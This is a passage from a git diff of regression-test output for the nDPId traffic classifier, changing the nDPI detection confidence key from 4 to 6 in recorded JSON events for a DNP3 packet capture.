allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 175 chars ~~ json string max len.......: 1932 chars diff --git a/test/results/dnp3.pcap.out b/test/results/dnp3.pcap.out index 159cec3cf..24b21370a 100644 --- a/test/results/dnp3.pcap.out +++ b/test/results/dnp3.pcap.out @@ -4,57 +4,57 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":40,"packets-processed":39,"total-skipped-flows":0,"total-l4-payload-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1097502623045} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":79,"packets-processed":78,"total-skipped-flows":0,"total-l4-payload-len":540,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1097504102255} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-payload-len":3957,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1097505644006} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":352,"packets-processed":351,"total-skipped-flows":0,"total-l4-payload-len":5682,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1097507785883} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":445,"packets-processed":444,"total-skipped-flows":0,"total-l4-payload-len":7101,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":5,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1097510947092} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":472,"packets-processed":471,"total-skipped-flows":0,"total-l4-payload-len":7296,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1097512255234} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} 